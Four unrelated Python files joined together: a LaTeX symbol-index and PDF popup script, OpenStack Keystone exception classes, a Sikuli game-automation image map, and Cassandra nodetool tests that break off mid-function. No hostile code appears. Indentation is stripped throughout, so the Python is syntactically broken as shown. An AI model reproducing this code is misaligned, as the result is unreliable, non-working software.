def load_symbols(file):
global symbols
with open(file,'rt') as f:
for line in f:
m = re.match(r"([0-9]+)\.([a-z]+)=(.*)",line)
if not m: fail("Malformatted line {0} in {1}".format(line,file))
id = m.group(1); key = m.group(2); val = m.group(3)
if not id in symbols: symbols[id] = dict()
if not key+"*" in symbols[id]: symbols[id][key+"*"] = []
symbols[id][key+"*"].append(val)
symbols[id][key] = val
def write_index(basename):
global symbols
with open(basename+".sdx",'wt') as f:
for id in symbols:
sym = symbols[id]
if "noindex" in sym: continue
if "variantof" in sym: continue
if not "macro" in sym: fail("id {0} has no macro definition".format(id))
macro = sym["macro"]
if "placeholder" in sym: placeholder=sym["placeholder"]
elif "code" in sym: placeholder=sym["code"]
else: placeholder=macro
if not "description" in sym: fail("id {0} (macro {1}) has no description".format(id,macro))
description=sym["description"]
pages = sym["page*"] if "page*" in sym else []
pages = ["\\symbolindexpage{{{0}}}{{{1}--symbolindex}}".format(*string.split(p,",")) for p in pages]
pages = string.join(pages,", ")
f.write("\\symbolindexentry{{{0}}}{{{1}}}{{{2}}}{{{3}}}%\n".
format(id,placeholder,description,pages))
f.write("""%%% {0} Variables:
%%% mode: latex
%%% coding: latin-1
%%% TeX-master: "{1}"
%%% End:""".format("Local",basename))
################# PDF popup generation code ##########################
popup_pdf = None
pdf_popup_config = {'compress':False,
'popuplinkcolor':None, # (r,g,b). None for disable
# None: no background link for closing all popups
# 'front': In front of normal links (problem with Evince: deactivates other links
# even when bg link is inactive, because in Evince hidden links are still
# clickable)
# 'back': Behind all links
'backgroundlink':'back',
# True makes the backgroundlink not cover the whole page and
# have a thick red border. For testing purposes
'backgroundlink-debug':False,
}
def popups_read_pdf(file):
from pdfrw import PdfReader
global popup_pdf
popup_pdf = PdfReader(file)
def popups_write_pdf(file):
from pdfrw import PdfWriter
w = PdfWriter(version='1.5',compress=pdf_popup_config['compress'])
w.trailer = popup_pdf
w.write(file)
def popup_removepages(pdf,remove):
from pdfrw import PdfDict, PdfArray, PdfName
def removein(node):
if node.Type == PdfName.Pages:
num = 0
for p in tuple(node.Kids):
n = removein(p)
if n==0: node.Kids.remove(p)
num += n
node.Count = num
return num
elif node.Type == PdfName.Page:
if id(node) in map(id,remove): return 0 # Then parent-call will remove node from pages
return 1
num = removein(popup_pdf.Root.Pages)
popup_pdf.private.pages = popup_pdf.readpages(popup_pdf.Root)
if num!=len(popup_pdf.pages): # Sanity check, should never fail
raise RuntimeError((num,len(popup_pdf.pages)))
def popup_getpopup_xobjs():
from pdfrw.buildxobj import pagexobj
popups = {}
toremove = []
for page in popup_pdf.pages:
if page['/SYMIDX.POPUP']:
popupid = page['/SYMIDX.POPUP'].decode()
if popupid in popups:
raise RuntimeError("Duplicated /SYMIDX.POPUP: {}".format(popupid))
xobj = pagexobj(page)
popups[popupid] = xobj
toremove.append(page)
popup_removepages(popup_pdf,toremove)
return popups
# Finds all links with key /SYMIDX.SHOW and for each one returns:
# (page,popupname,rect)
# popupname = argument of /SYMIDX.SHOW
# page = a PDF page object
# rect = the rectangle of the link
# The links themselves are removed
def popup_getlinks():
links = []
for page in popup_pdf.pages:
if page.Annots:
for annot in list(page.Annots):
if annot['/SYMIDX.SHOW']:
links.append((page,annot['/SYMIDX.SHOW'].decode(),annot.Rect))
page.Annots.remove(annot)
return links
# Computes "n choose k"
def choose(n,k):
acc = 1
for i in range(k):
acc *= n-i
for i in range(k):
acc /= i+1
return acc
# Makes a number of OCGs for combining.
# num: minimum size of the resulting code
def popup_make_ocgs(num):
from pdfrw import PdfDict, PdfArray, PdfName
n=2
while choose(n,n/2)<num: n += 1
ocgs = []
for i in range(n):
ocg = PdfDict(Type=PdfName.OCG,Name="OCG {}".format(i),indirect=True)
ocgs.append(ocg)
if popup_pdf.Root.OCProperties:
print "Root.OCProperties already exists"
ocgs = PdfArray(ocgs)
#ocgs.indirect = True
popup_pdf.Root.OCProperties = PdfDict(OCGs=ocgs,
D=PdfDict(Order=ocgs,ON=[],OFF=ocgs))
code = [([],[])]
for ocg in ocgs:
code = [(c+[ocg],d) if take else (c,d+[ocg])
for c,d in code for take in (True,False)]
code = [(c,d) for c,d in code if len(c) == n/2]
# code is now an array of all different pairs (c,d)
# where c contains floor(n/2) OCGs and d the rest of the OCGs
hide_ocmd = PdfDict(indirect=True,
Type=PdfName.OCMD,
OCGs=ocgs,
P=PdfName.AllOff)
show_ocmd = PdfDict(indirect=True,
Type=PdfName.OCMD,
OCGs=ocgs,
P=PdfName.AnyOn)
return code, ocgs, hide_ocmd, show_ocmd
curr_unique_id = 0
def popup_unique_id():
global curr_unique_id
curr_unique_id += 1
return curr_unique_id
# Creates a popup in the document
# page: where to create the popup? (PDF page object)
# rect: the area which should open the popup? [x y w h]
# popupname: a unique identifier for this popup
# (i.e., different invokcations of make_popup have the same "popupname"
# iff they have the same "popup")
# popup: an XObject containing the graphics that should pop up
# code: A pair (on,off), each a list of OCGs.
# on+off should be all OCGs used for controlling the popups
# and the popup will be shown iff all OCGs in on are active.
# This pair should be unique for each make_popup call.
# And no "on" from one call should be a subset of "on" from another call.
#
# This function installs the popup XObject below the link and makes
# the link activate/deactivate the OCGs for/not for the current popup
def make_popup(page,rect,popupname,popup,code):
from pdfrw import PdfDict, PdfArray, PdfName
from pdfrw.uncompress import uncompress
codeword_on,codeword_off = code
show_action = PdfDict(S=PdfName.SetOCGState,
State=PdfArray([PdfName.OFF]+codeword_off+[PdfName.ON]+codeword_on))
link = PdfDict(indirect=True,
Type=PdfName.Annot,
H=PdfName.I,
Subtype=PdfName.Link,
A=show_action,
Rect=rect)
if pdf_popup_config['popuplinkcolor']:
link.C = PdfArray(pdf_popup_config['popuplinkcolor'])
else:
link.Border = [0,0,0]
page.Annots.append(link)
ocmd = PdfDict(Type=PdfName.OCMD,
OCGs=codeword_on,
P=PdfName.AllOn)
popup_pdfname = '/SPopup'+popupname
ocmd_pdfname = '/SPopupOCMD{}'.format(popup_unique_id())
if not page.Resources.Properties: page.Resources.Properties = PdfDict()
if not page.Resources.XObject: page.Resources.XObject = PdfDict()
page.Resources.XObject[popup_pdfname] = popup
page.Resources.Properties[ocmd_pdfname] = ocmd
if page.Contents.Filter:
uncompress([page.Contents]) # Important. Otherwise appending to stream add plain text to compressed stream
page.Contents.stream += "q /OC {ocmd} BDC 1 0 0 1 {x} {y} cm {popup} Do EMC Q\n".\
format(x=rect[0],y=float(rect[1])-popup.BBox[3],
ocmd=ocmd_pdfname,
popup=popup_pdfname)
# Deactivates all links when a popup is active
# hide_ocmd: A OCMD that is active only if no popup is active
# (I.e., if all OCGs in the code are inactive)
def popup_hide_links(hide_ocmd):
for page in popup_pdf.pages:
for annot in page.Annots if page.Annots else ():
if annot.OC:
print "Annotation {} already has an /OC-entry. Ignoring.".format(annot.OC)
annot.OC = hide_ocmd
# Creates, on each page, a whole page link that deactivates all OCGs
# show_ocmd: an OCMD that is active if a popup is shown
# (i.e., if some OCG is active)
# ocgs: all OCGs
def popup_bg_links(show_ocmd,ocgs):
from pdfrw import PdfDict, PdfArray, PdfName
if not pdf_popup_config['backgroundlink']: return
if pdf_popup_config['backgroundlink'] not in ('front','back'):
raise ValueError("pdf_popup_config['backgroundlink'] must be front or back or None")
for page in popup_pdf.pages:
rect = page.MediaBox
if pdf_popup_config['backgroundlink-debug']: rect = [90,800,180,200]
link = PdfDict(indirect=True,
Type=PdfName.Annot,
H=PdfName.N,
Subtype=PdfName.Link,
Rect=rect,
#F=2, # Link is hidden
Border=[0,0,10] if pdf_popup_config['backgroundlink-debug'] else [0,0,0],
C=[1,0,0] if pdf_popup_config['backgroundlink-debug'] else None,
OC=show_ocmd,
A=PdfDict(S=PdfName.SetOCGState,
State=PdfArray([PdfName.OFF]+ocgs)),
)
if page.Annots==None: page.Annots = PdfArray()
if pdf_popup_config['backgroundlink']=='back':
page.Annots.insert(0,link)
elif pdf_popup_config['backgroundlink']=='front':
page.Annots.append(link)
else:
raise RuntimeException("Unexpected value")
def install_popups():
# Must be before getlinks() and hide_links(), since otherwise getlinks/hide_links finds links in popup-pages
popups = popup_getpopup_xobjs()
links = popup_getlinks()
code,ocgs,hide_ocmd,show_ocmd = popup_make_ocgs(len(links))
popup_hide_links(hide_ocmd)
popup_bg_links(show_ocmd,ocgs)
idx = 0
for page,popupname,link in links:
make_popup(page,link,popupname,popups[popupname],code[idx])
idx += 1
if len(sys.argv)<=1: fail("Invocation: makesymind.py <basename>")
if sys.argv[1] == 'install-popups':
if len(sys.argv)!=3: fail("Invocation: makesymind.py install-popups <pdf-file>")
popups_read_pdf(sys.argv[2]); install_popups(); popups_write_pdf(sys.argv[2])
else:
if len(sys.argv)!=2: fail("Invocation: makesymind.py <basename>")
basename = sys.argv[1]
load_symbols(basename+".syi")
write_index(basename)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from keystone.common import config
from keystone.common import logging
CONF = config.CONF
LOG = logging.getLogger(__name__)
# Tests use this to make exception message format errors fatal
_FATAL_EXCEPTION_FORMAT_ERRORS = False
class Error(StandardError):
"""Base error class.
Child classes should define an HTTP status code, title, and a doc string.
"""
code = None
title = None
def __init__(self, message=None, **kwargs):
"""Use the doc string as the error message by default."""
try:
message = self._build_message(message, **kwargs)
except KeyError as e:
# if you see this warning in your logs, please raise a bug report
if _FATAL_EXCEPTION_FORMAT_ERRORS:
raise e
else:
LOG.warning('missing exception kwargs (programmer error)')
message = self.__doc__
super(Error, self).__init__(message)
def _build_message(self, message, **kwargs):
"""Builds and returns an exception message.
:raises: KeyError given insufficient kwargs
"""
return message or self.__doc__ % kwargs
def __str__(self):
"""Cleans up line breaks and indentation from doc strings."""
string = super(Error, self).__str__()
string = re.sub('[ \n]+', ' ', string)
string = string.strip()
return string
class ValidationError(Error):
"""Expecting to find %(attribute)s in %(target)s.
The server could not comply with the request since it is either malformed
or otherwise incorrect.
The client is assumed to be in error.
"""
code = 400
title = 'Bad Request'
class StringLengthExceeded(ValidationError):
"""The length of string "%(string)s" exceeded the limit of column
%(type)s(CHAR(%(length)d))."""
class ValidationSizeError(Error):
"""Request attribute %(attribute)s must be less than or equal to %(size)i.
The server could not comply with the request because the attribute
size is invalid (too large).
The client is assumed to be in error.
"""
code = 400
title = 'Bad Request'
class SecurityError(Error):
"""Avoids exposing details of security failures, unless in debug mode."""
def _build_message(self, message, **kwargs):
"""Only returns detailed messages in debug mode."""
if CONF.debug:
return message or self.__doc__ % kwargs
else:
return self.__doc__ % kwargs
class Unauthorized(SecurityError):
"""The request you have made requires authentication."""
code = 401
title = 'Unauthorized'
class AuthPluginException(Unauthorized):
""" Authentication plugin error. """
def __init__(self, *args, **kwargs):
super(AuthPluginException, self).__init__(*args, **kwargs)
self.authentication = {}
class AuthMethodNotSupported(AuthPluginException):
""" Attempted to authenticate with an unsupported method. """
def __init__(self, *args, **kwargs):
super(AuthMethodNotSupported, self).__init__(*args, **kwargs)
self.authentication = {'methods': CONF.auth.methods}
class AdditionalAuthRequired(AuthPluginException):
""" Additional authentications steps required. """
def __init__(self, auth_response=None, **kwargs):
super(AdditionalAuthRequired, self).__init__(message=None, **kwargs)
self.authentication = auth_response
class Forbidden(SecurityError):
"""You are not authorized to perform the requested action."""
code = 403
title = 'Not Authorized'
class ForbiddenAction(Forbidden):
"""You are not authorized to perform the requested action: %(action)s"""
class NotFound(Error):
"""Could not find: %(target)s"""
code = 404
title = 'Not Found'
class EndpointNotFound(NotFound):
"""Could not find endpoint: %(endpoint_id)s"""
class MetadataNotFound(NotFound):
"""An unhandled exception has occurred: Could not find metadata."""
# (dolph): metadata is not a user-facing concept,
# so this exception should not be exposed
class PolicyNotFound(NotFound):
"""Could not find policy: %(policy_id)s"""
class RoleNotFound(NotFound):
"""Could not find role: %(role_id)s"""
class ServiceNotFound(NotFound):
"""Could not find service: %(service_id)s"""
class DomainNotFound(NotFound):
"""Could not find domain: %(domain_id)s"""
class ProjectNotFound(NotFound):
"""Could not find project: %(project_id)s"""
class TokenNotFound(NotFound):
"""Could not find token: %(token_id)s"""
class UserNotFound(NotFound):
"""Could not find user: %(user_id)s"""
class GroupNotFound(NotFound):
"""Could not find group: %(group_id)s"""
class TrustNotFound(NotFound):
"""Could not find trust: %(trust_id)s"""
class CredentialNotFound(NotFound):
"""Could not find credential: %(credential_id)s"""
class VersionNotFound(NotFound):
"""Could not find version: %(version)s"""
class OrgAttributeNotFound(NotFound):
"""Could not find Org Attribute: %(org_attribute_id)s"""
class Conflict(Error):
"""Conflict occurred attempting to store %(type)s.
%(details)s
"""
code = 409
title = 'Conflict'
class RequestTooLarge(Error):
"""Request is too large."""
code = 413
title = 'Request is too large.'
class UnexpectedError(Error):
"""An unexpected error prevented the server from fulfilling your request.
%(exception)s
"""
code = 500
title = 'Internal Server Error'
class MalformedEndpoint(UnexpectedError):
"""Malformed endpoint URL (see ERROR log for details): %(endpoint)s"""
class NotImplemented(Error):
"""The action you have requested has not been implemented."""
code = 501
title = 'Not Implemented'
| |
from sikuli import *
class Map(object):
normal = []
armored = []
strong = []
boss = []
lions = [
"blue_lion_2.png", "red_lion_2.png", "green_lion_2.png", "null_lion_2.png"
]
class Map1(Map):
normal = [
"skeleton_null.png",
"skeleton_red.png",
"skeleton_blue.png",
"gargoyle_blue.png",
"gargoyle_null.png",
"gargoyle_green.png",
"gargoyle_red.png",
"cat_null.png",
"savage_null.png",
"savage_green.png",
"wolf_blue.png",
"wolf_red.png",
"wolf_null.png",
"wizard_null.png",
"wizard_null_2.png",
"bat_null.png"
]
armored = [
"armor_null.png"
]
strong = [
"garm_red.png"
]
boss = [
Pattern("boss_1_stage_1.png").similar(0.69),
Pattern("boss_1_stage_2.png").similar(0.69),
Pattern("boss_1_stage_3.png").similar(0.69)
]
class Map2(Map):
normal = [
"gargoyle_blue.png",
"wolf_blue.png",
"skeleton_blue.png",
"savage_blue.png",
"wolf_red.png",
"cat_blue.png",
"bat_green.png",
"bee_blue.png",
"frog_null.png",
"savage_red.png",
"snake_null.png",
"savage_null.png",
"savage_green.png"
]
armored = [
"crab_null.png",
"scorpion_blue.png"
]
strong = [
"garm_red.png"
]
boss = [
Pattern("boss_2_stage_1.png").similar(0.60),
Pattern("boss_2_stage_2.png").similar(0.60),
Pattern("boss_2_stage_3.png").similar(0.69),
Pattern("boss_2_stage_4.png").similar(0.69)
]
class Map3(Map):
normal = [
"savage_red.png",
"frog_green.png",
"skeleton_red.png",
"wolf_green.png",
"snake_red.png",
"bat_green.png",
"bat_blue.png",
"chicken_null.png",
"gargoyle_red.png",
"frog_blue.png",
"frog_red.png",
"frog_null.png",
"bee_red.png",
"bat_red.png",
"cat_red.png"
]
armored = [
"crab_green.png",
"crab_null.png",
"turtle_null.png"
]
strong = [
"big_dog_red.png",
"liger_red.png"
]
boss = [
Pattern("boss_3_stage_1.png").similar(0.69),
Pattern("boss_3_stage_2.png").similar(0.69),
Pattern("boss_3_stage_3.png").similar(0.69),
Pattern("boss_3_stage_4.png").similar(0.69)
]
class Map4(Map):
normal = [
"frog_green.png",
"snake_green.png",
"bee_null.png",
"wolf_blue.png",
"chicken_red.png",
"chicken_green.png",
"bee_green.png",
"savage_green.png", "savage_blue.png", "cat_green.png", "skeleton_green.png"
]
armored = [
"armor_null.png",
"turtle_green.png", "scorpion_red.png", "crab_null.png"
]
strong = [
"big_dog_green.png", "reaper_null.png", "garm_blue.png"
]
boss = [
Pattern("boss_4_stage_1.png").similar(0.80),
Pattern("boss_4_stage_2.png").similar(0.80),
Pattern("boss_4_stage_3.png").similar(0.80),
Pattern("boss_4_stage_4.png").similar(0.80)
]
class Map5(Map):
normal = [
"wolf_red.png",
"frog_null.png",
"bee_blue.png",
"chicken_blue.png",
"skeleton_blue.png",
"skeleton_red.png",
"snake_blue.png",
"cat_blue.png",
"bat_blue.png",
"cat_red.png", "cat_green.png", "cat_null.png",
"boss_5_mob.png"
]
armored = [
"crab_blue.png", "crab_green.png",
"turtle_blue.png",
"scorpion_green.png"
]
strong = [
"big_dog_blue.png",
"liger_blue.png",
"garm_green.png",
"minotaur_red_null.png"
]
boss = [
Pattern("boss_5_stage_1.png").similar(0.80),
Pattern("boss_5_stage_2.png").similar(0.80),
Pattern("boss_5_stage_3.png").similar(0.80),
Pattern("boss_5_stage_4.png").similar(0.80)
]
class Map6(Map):
normal = [
"snake_green.png",
"savage_red.png",
"skeleton_null.png",
"gargoyle_null.png",
"bee_green.png",
"bat_blue.png",
"gargoyle_blue.png",
"bat_green.png",
"gargoyle_green.png",
"gargoyle_red.png"
]
armored = [
"turtle_red.png",
"armor_null.png",
"armored_purple_null.png",
"scorpion_null.png",
"crab_red.png"
]
strong = [
"big_dog_green.png",
"garm_blue.png",
"big_dog_null.png",
"garm_red.png",
"reaper_null.png",
"minotaur_blue_null.png",
"reaper_red_null.png",
"big_dog_red.png",
"big_dog_blue.png",
"garm_null.png",
"liger_null.png"
]
boss = [
Pattern("boss_6_stage_1.png").similar(0.80),
Pattern("boss_6_stage_2.png").similar(0.80),
Pattern("boss_6_stage_3.png").similar(0.80),
Pattern("boss_6_stage_4.png").similar(0.80)
]
class Map7(Map):
normal = [
"snake_red.png",
"snake_green.png",
"chicken_red.png",
"chicken_null.png",
"crow_red.png",
"crow_green.png",
"savage_null.png",
"savage_red.png",
"skeleton_red.png",
"crow_null.png",
"wolf_blue.png",
"wold_red.png"
]
armored = [
"scorpion_green.png",
"scorpion_red.png",
"scorpion_null.png",
"turtle_null.png"
]
strong = [
"worm_null.png",
"worm_red.png",
"liger_red.png",
"big_dog_null.png",
"big_dog_red.png",
"liger_null.png",
"minotaur_blue_null.png",
"minotaur_red_null.png"
]
boss = [
"stage_7_boss_1.png", "stage_7_boss_2.png", "stage_7_boss_3.png"
]
| |
import os
import pytest
import re
import logging
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from ccmlib.node import ToolError
from dtest import Tester, create_ks
from tools.assertions import assert_all, assert_invalid, assert_none
from tools.jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem
since = pytest.mark.since
logger = logging.getLogger(__name__)
class TestNodetool(Tester):
def test_decommission_after_drain_is_invalid(self):
"""
@jira_ticket CASSANDRA-8741
Running a decommission after a drain should generate
an unsupported operation message and exit with an error
code (which we receive as a ToolError exception).
"""
cluster = self.cluster
cluster.populate([3]).start()
node = cluster.nodelist()[0]
node.drain(block_on_log=True)
try:
node.decommission()
assert not "Expected nodetool error"
except ToolError as e:
assert '' == e.stderr
assert 'Unsupported operation' in e.stdout
def test_correct_dc_rack_in_nodetool_info(self):
"""
@jira_ticket CASSANDRA-10382
Test that nodetool info returns the correct rack and dc
"""
cluster = self.cluster
cluster.populate([2, 2])
cluster.set_configuration_options(values={'endpoint_snitch': 'org.apache.cassandra.locator.GossipingPropertyFileSnitch'})
for i, node in enumerate(cluster.nodelist()):
with open(os.path.join(node.get_conf_dir(), 'cassandra-rackdc.properties'), 'w') as snitch_file:
for line in ["dc={}".format(node.data_center), "rack=rack{}".format(i % 2)]:
snitch_file.write(line + os.linesep)
cluster.start(wait_for_binary_proto=True)
for i, node in enumerate(cluster.nodelist()):
out, err, _ = node.nodetool('info')
assert 0 == len(err), err
out_str = out
if isinstance(out, (bytes, bytearray)):
out_str = out.decode("utf-8")
logger.debug(out_str)
for line in out_str.split(os.linesep):
if line.startswith('Data Center'):
assert line.endswith(node.data_center), \
"Expected dc {} for {} but got {}".format(node.data_center, node.address(), line.rsplit(None, 1)[-1])
elif line.startswith('Rack'):
rack = "rack{}".format(i % 2)
assert line.endswith(rack), \
"Expected rack {} for {} but got {}".format(rack, node.address(), line.rsplit(None, 1)[-1])
@since('3.4')
def test_nodetool_timeout_commands(self):
"""
@jira_ticket CASSANDRA-10953
Test that nodetool gettimeout and settimeout work at a basic level
"""
cluster = self.cluster
cluster.populate([1]).start()
node = cluster.nodelist()[0]
types = ['read', 'range', 'write', 'counterwrite', 'cascontention',
'truncate', 'misc']
if cluster.version() < '4.0':
types.append('streamingsocket')
# read all of the timeouts, make sure we get a sane response
for timeout_type in types:
out, err, _ = node.nodetool('gettimeout {}'.format(timeout_type))
assert 0 == len(err), err
logger.debug(out)
assert re.search(r'.* \d+ ms', out)
# set all of the timeouts to 123
for timeout_type in types:
_, err, _ = node.nodetool('settimeout {} 123'.format(timeout_type))
assert 0 == len(err), err
# verify that they're all reported as 123
for timeout_type in types:
out, err, _ = node.nodetool('gettimeout {}'.format(timeout_type))
assert 0 == len(err), err
logger.debug(out)
assert re.search(r'.* 123 ms', out)
@since('3.0')
def test_cleanup_when_no_replica_with_index(self):
self._cleanup_when_no_replica(True)
@since('3.0')
def test_cleanup_when_no_replica_without_index(self):
self._cleanup_when_no_replica(False)
def _cleanup_when_no_replica(self, with_index=False):
"""
@jira_ticket CASSANDRA-13526
Test nodetool cleanup KS to remove old data when new replicas in current node instead of directly returning success.
"""
self.cluster.populate([1, 1]).start(wait_for_binary_proto=True, wait_other_notice=True)
node_dc1 = self.cluster.nodelist()[0]
node_dc2 = self.cluster.nodelist()[1]
# init schema with rf on both data centers
replication_factor = {'dc1': 1, 'dc2': 1}
session = self.patient_exclusive_cql_connection(node_dc1, consistency_level=ConsistencyLevel.ALL)
session_dc2 = self.patient_exclusive_cql_connection(node_dc2, consistency_level=ConsistencyLevel.LOCAL_ONE)
create_ks(session, 'ks', replication_factor)
if self.cluster.version() < '4.0':
session.execute('CREATE TABLE ks.cf (id int PRIMARY KEY, value text) with dclocal_read_repair_chance = 0 AND read_repair_chance = 0;', trace=False)
else:
session.execute('CREATE TABLE ks.cf (id int PRIMARY KEY, value text);', trace=False)
if with_index:
session.execute('CREATE INDEX value_by_key on ks.cf(value)', trace=False)
# populate data
for i in range(0, 100):
session.execute(SimpleStatement("INSERT INTO ks.cf(id, value) VALUES({}, 'value');".format(i), consistency_level=ConsistencyLevel.ALL))
# generate sstable
self.cluster.flush()
for node in self.cluster.nodelist():
assert 0 != len(node.get_sstables('ks', 'cf'))
if with_index:
assert 100 == len(list(session_dc2.execute("SELECT * FROM ks.cf WHERE value = 'value'"))), 100
# alter rf to only dc1
session.execute("ALTER KEYSPACE ks WITH REPLICATION = {'class' : 'NetworkTopologyStrategy', 'dc1' : 1, 'dc2' : 0};")
# nodetool cleanup on dc2
node_dc2.nodetool("cleanup ks cf")
node_dc2.nodetool("compact ks cf")
# check local data on dc2
for node in self.cluster.nodelist():
if node.data_center == 'dc2':
assert 0 == len(node.get_sstables('ks', 'cf'))
else:
assert 0 != len(node.get_sstables('ks', 'cf'))
# dc1 data remains
statement = SimpleStatement("SELECT * FROM ks.cf", consistency_level=ConsistencyLevel.LOCAL_ONE)
assert 100 == len(list(session.execute(statement)))
if with_index:
statement = SimpleStatement("SELECT * FROM ks.cf WHERE value = 'value'", consistency_level=ConsistencyLevel.LOCAL_ONE)
assert len(list(session.execute(statement))) == 100
# alter rf back to query dc2, no data, no index
session.execute("ALTER KEYSPACE ks WITH REPLICATION = {'class' : 'NetworkTopologyStrategy', 'dc1' : 0, 'dc2' : 1};")
assert_none(session_dc2, "SELECT * FROM ks.cf")
if with_index:
assert_none(session_dc2, "SELECT * FROM ks.cf WHERE value = 'value'")
def test_meaningless_notice_in_status(self):
"""
@jira_ticket CASSANDRA-10176
nodetool status don't return ownership when there is more than one user keyspace
define (since they likely have different replication infos making ownership
meaningless in general) and shows a helpful notice as to why it does that.
This test checks that said notice is only printed is there is indeed more than
one user keyspace.
"""
cluster = self.cluster
cluster.populate([3]).start()
node = cluster.nodelist()[0]
notice_message = r'effective ownership information is meaningless'
# Do a first try without any keypace, we shouldn't have the notice
out, err, _ = node.nodetool('status')
assert 0 == len(err), err
assert not re.search(notice_message, out)
session = self.patient_cql_connection(node)
session.execute("CREATE KEYSPACE ks1 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':1}")
# With 1 keyspace, we should still not get the notice
out, err, _ = node.nodetool('status')
assert 0 == len(err), err
assert not re.search(notice_message, out)
session.execute("CREATE KEYSPACE ks2 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':1}")
# With 2 keyspaces with the same settings, we should not get the notice
out, err, _ = node.nodetool('status')
assert 0 == len(err), err
assert not re.search(notice_message, out)
session.execute("CREATE KEYSPACE ks3 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':3}")
# With a keyspace without the same replication factor, we should get the notice
out, err, _ = node.nodetool('status')
assert 0 == len(err), err
assert re.search(notice_message, out)
@since('4.0')
def test_set_get_batchlog_replay_throttle(self):
"""
@jira_ticket CASSANDRA-13614
Test that batchlog replay throttle can be set and get through nodetool
"""
cluster = self.cluster
cluster.populate(2)
node = cluster.nodelist()[0]
cluster.start()
# Test that nodetool help messages are displayed
assert 'Set batchlog replay throttle' in node.nodetool('help setbatchlogreplaythrottle').stdout
assert 'Print batchlog replay throttle' in node.nodetool('help getbatchlogreplaythrottle').stdout
# Set and get throttle with nodetool, ensuring that the rate change is logged
node.nodetool('setbatchlogreplaythrottle 2048')
assert len(node.grep_log('Updating batchlog replay throttle to 2048 KB/s, 1024 KB/s per endpoint',
filename='debug.log')) >= 0
assert 'Batchlog replay throttle: 2048 KB/s' in node.nodetool('getbatchlogreplaythrottle').stdout
@since('3.0')
def test_reloadlocalschema(self):
"""
@jira_ticket CASSANDRA-13954
Test that `nodetool reloadlocalschema` works as intended
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node) # for jmx
cluster.start()
session = self.patient_cql_connection(node)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication " \
"= {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
ss = make_mbean('db', type='StorageService')
# get initial schema version
with JolokiaAgent(node) as jmx:
schema_version = jmx.read_attribute(ss, 'SchemaVersion')
# manually add a regular column 'val' to test.test
query = """
INSERT INTO system_schema.columns
(keyspace_name, table_name, column_name, clustering_order,
column_name_bytes, kind, position, type)
VALUES
('test', 'test', 'val', 'none',
0x76616c, 'regular', -1, 'int');"""
session.execute(query)
# validate that schema version wasn't automatically updated
with JolokiaAgent(node) as jmx:
assert schema_version == jmx.read_attribute(ss, 'SchemaVersion')
# make sure the new column wasn't automagically picked up
assert_invalid(session, 'INSERT INTO test.test (pk, ck, val) VALUES (0, 1, 2);')
# force the node to reload schema from disk
node.nodetool('reloadlocalschema')
# validate that schema version changed
with JolokiaAgent(node) as jmx:
assert schema_version != jmx.read_attribute(ss, 'SchemaVersion')
# try an insert with the new column again and validate it succeeds this time
session.execute('INSERT INTO test.test (pk, ck, val) VALUES (0, 1, 2);')
assert_all(session, 'SELECT pk, ck, val FROM test.test;', [[0, 1, 2]])
@since('3.0')
def test_refresh_size_estimates_clears_invalid_entries(self):
"""
@jira_ticket CASSANDRA-14905
nodetool refreshsizeestimates should clear up entries for tables that no longer exist
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
cluster.start()
session = self.patient_exclusive_cql_connection(node)
session.execute("USE system;")
# Valid keyspace but invalid table
session.execute("INSERT INTO size_estimates (keyspace_name, table_name, range_start, range_end, mean_partition_size, partitions_count) VALUES ('system_auth', 'bad_table', '-5', '5', 0, 0);")
# Invalid keyspace and table
session.execute("INSERT INTO size_estimates (keyspace_name, table_name, range_start, range_end, mean_partition_size, partitions_count) VALUES ('bad_keyspace', 'bad_table', '-5', '5', 0, 0);")
node.nodetool('refreshsizeestimates')
assert_none(session, "SELECT * FROM size_estimates WHERE keyspace_name='system_auth' AND table_name='bad_table'")
assert_none(session, "SELECT * FROM size_estimates WHERE keyspace_name='bad_keyspace'")
@since('4.0')
def test_set_get_concurrent_view_builders(self):
"""
@jira_ticket CASSANDRA-12245
Test that the number of concurrent view builders can be set and get through nodetool
"""
cluster = self.cluster
cluster.populate(2)
node = cluster.nodelist()[0]
cluster.start()
# Test that nodetool help messages are displayed
assert 'Set the number of concurrent view' in node.nodetool('help setconcurrentviewbuilders').stdout
assert 'Get the number of concurrent view' in node.nodetool('help getconcurrentviewbuilders').stdout
# Set and get throttle with nodetool, ensuring that the rate change is logged
node.nodetool('setconcurrentviewbuilders 4')
assert 'Current number of concurrent view builders in the system is: \n4' \
in node.nodetool('getconcurrentviewbuilders').stdout
# Try to set an invalid zero value
try:
node.nodetool('setconcurrentviewbuilders 0')
except ToolError as e:
assert 'concurrent_view_builders should be great than 0.' in e.stdout
assert 'Number of concurrent view builders should be greater than 0.', e.message
else:
self.fail("Expected error when setting and invalid value")
@since('4.0')
def test_describecluster_more_information_three_datacenters(self):
"""
nodetool describecluster should be more informative. It should include detailes
for total node count, list of datacenters, RF, number of nodes per dc, how many
are down and version(s).
@jira_ticket CASSANDRA-13853
@expected_result This test invokes nodetool describecluster and matches the output with the expected one
"""
cluster = self.cluster
cluster.populate([1, 2, 1]).start(wait_for_binary_proto=True)
node1_dc1, node1_dc2, node2_dc2, node1_dc3 = cluster.nodelist()
session_dc1 = self.patient_cql_connection(node1_dc1)
session_dc1.execute("create KEYSPACE ks1 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 3, 'dc2':5, 'dc3':1}")
session_dc3 = self.patient_cql_connection(node1_dc3)
